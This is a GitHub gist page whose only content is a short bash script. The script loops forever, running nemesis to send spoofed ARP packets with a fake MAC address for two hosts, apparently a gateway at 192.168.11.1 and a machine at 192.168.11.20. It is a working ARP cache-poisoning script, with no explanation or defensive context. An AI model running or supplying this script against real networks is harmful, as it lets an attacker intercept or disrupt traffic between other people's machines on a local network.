Skip to content

Instantly share code, notes, and snippets.

@akashksunny13
Last active December 14, 2015 18:59
#!/bin/bash
while [ 1 ]
do
sudo nemesis arp -v -d eth0 -H 0:1:2:3:4:5 -S 192.168.11.1 -D 192.168.11.20
sudo nemesis arp -v -d eth0 -H 0:1:2:3:4:5 -S 192.168.11.20 -D 192.168.11.1
sleep 5s
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment